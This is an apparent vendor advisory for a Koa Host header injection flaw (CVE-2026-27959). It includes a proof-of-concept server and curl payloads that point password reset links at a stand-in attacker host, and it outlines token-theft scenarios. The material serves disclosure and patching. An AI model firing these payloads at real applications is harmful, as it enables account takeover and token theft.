Summary
Koa's ctx.hostname API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a @ symbol (e.g., evil.com:[email protected]) is received, ctx.hostname returns evil.com - an attacker-controlled value. Applications using ctx.hostname for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.
Details
The vulnerability exists in Koa's hostname getter in lib/request.js:
// Koa 2.16.1 - lib/request.js
get hostname() {
const host = this.host;
if (!host) return '';
if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal
return host.split(':', 1)[0];
}
The host getter retrieves the raw header value with HTTP/2 and proxy support:
// Koa 2.16.1 - lib/request.js
get host() {
const proxy = this.app.proxy;
let host = proxy && this.get('X-Forwarded-Host');
if (!host) {
if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
if (!host) host = this.get('Host');
}
if (!host) return '';
return host.split(',')[0].trim();
}
The Problem
The parsing logic simply splits on the first : and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.
RFC 3986 Section 3.2.2 defines the host component as:
host = IP-literal / IPv4address / reg-name
reg-name = *( unreserved / pct-encoded / sub-delims )
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
The @ character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.
Attack Vector
When an attacker sends:
Host: evil.com:[email protected]:3000
Koa parses this as:
| API | Returns | Notes |
|---|---|---|
ctx.get('Host') |
"evil.com:[email protected]:3000" |
Raw header |
ctx.hostname |
"evil.com" |
Attacker-controlled |
ctx.host |
"evil.com:[email protected]:3000" |
Raw header value |
ctx.origin |
"http://evil.com:[email protected]:3000" |
Protocol + malformed host |
The ctx.hostname API returns evil.com because the parser splits on the first : without understanding that evil.com:[email protected] is a malformed authority component where evil.com:fake would be interpreted as userinfo by a proper URI parser.
Additional Concern: ctx.origin
Koa's ctx.origin property concatenates protocol and host without validation:
// lib/request.js
get origin() {
return `${this.protocol}://${this.host}`;
}
Applications using ctx.origin for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.
HTTP/2 Consideration
Koa explicitly checks httpVersionMajor >= 2 to read the :authority pseudo-header:
if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
The same vulnerability applies - malformed :authority values containing userinfo would be accepted and parsed identically.
PoC
Setup
// server.js
const Koa = require('koa');
const app = new Koa();
// Simulates password reset URL generation (common vulnerable pattern)
app.use(async ctx => {
if (ctx.path === '/forgot-password') {
const resetToken = 'abc123securtoken';
const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;
ctx.body = {
message: 'Password reset link generated',
resetUrl: resetUrl,
debug: {
rawHost: ctx.get('Host'),
parsedHostname: ctx.hostname,
origin: ctx.origin,
protocol: ctx.protocol
}
};
}
});
app.listen(3000, () => console.log('Server on http://localhost:3000'));
Exploit
curl -H "Host: evil.com:fake@localhost:3000" http://localhost:3000/forgot-password
Result
{
"message": "Password reset link generated",
"resetUrl": "http://evil.com/reset?token=abc123securtoken",
"debug": {
"rawHost": "evil.com:fake@localhost:3000",
"parsedHostname": "evil.com",
"origin": "http://evil.com:fake@localhost:3000",
"protocol": "http"
}
}
The password reset URL points to evil.com instead of the legitimate server. In a real attack:
- Attacker requests password reset for victim's email with malicious Host header
- Server generates reset link using
ctx.hostname→https://evil.com/reset?token=SECRET - Victim receives email with poisoned link
- Victim clicks link, token is sent to attacker's server
- Attacker uses token to reset victim's password
Additional Test Cases
# Basic injection
curl -H "Host: evil.com:[email protected]" http://localhost:3000/forgot-password
# Result: hostname = "evil.com"
# With port preservation attempt
curl -H "Host: evil.com:[email protected]:3000" http://localhost:3000/forgot-password
# Result: hostname = "evil.com"
# Unicode/encoded variations
curl -H "Host: evil.com:x%40legitimate.com" http://localhost:3000/forgot-password
# Result: hostname = "evil.com"
Deployment Consideration
For this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:
- No reverse proxy - Application directly exposed to internet
- Misconfigured proxy - Proxy doesn't override/validate Host header
- Proxy trust enabled (
app.proxy = true) -X-Forwarded-Hostcan be injected - Default virtual host - Server is the catch-all for unrecognized Host headers
Vulnerability Type
- CWE-20: Improper Input Validation
- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax
Attack Scenarios
1. Password Reset Poisoning (High Severity)
- Attacker hijacks password reset tokens by poisoning reset URLs
- Requires victim to click link in email
- Results in account takeover
2. Email Verification Bypass
- Attacker poisons email verification links
- Can verify attacker-controlled email on victim accounts
3. OAuth/SSO Callback Manipulation
- Applications using
ctx.hostnamefor OAuth redirect URIs - Attacker redirects OAuth callbacks to malicious server
- Results in token theft
4. Web Cache Poisoning
- If responses are cached without Host in cache key
- Poisoned URLs served to all users
- Persistent XSS/phishing via cached responses
5. Server-Side Request Forgery (SSRF)
- Internal routing decisions based on
ctx.hostname - Attacker manipulates which backend receives requests
Who Is Impacted
- Direct impact: Any Koa application using
ctx.hostnameorctx.originfor URL generation without additional validation - Common patterns: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations
Impact
The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact: varies by context: data corruption, logic bypass, or denial of service.
CVE-2026-27959 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.1.2, 2.16.4); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
koa to 3.1.2 or later; koa to 2.16.4 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-27959? CVE-2026-27959 is a high-severity improper input validation vulnerability in koa (npm), affecting versions >= 3.0.0, < 3.1.2. It is fixed in 3.1.2, 2.16.4. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
- How severe is CVE-2026-27959? CVE-2026-27959 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of koa are affected by CVE-2026-27959? koa (npm) versions >= 3.0.0, < 3.1.2 is affected.
- Is there a fix for CVE-2026-27959? Yes. CVE-2026-27959 is fixed in 3.1.2, 2.16.4. Upgrade to this version or later.
- Is CVE-2026-27959 exploitable, and should I be worried? Whether CVE-2026-27959 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-27959 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-27959?
- Upgrade
koato 3.1.2 or later - Upgrade
koato 2.16.4 or later
- Upgrade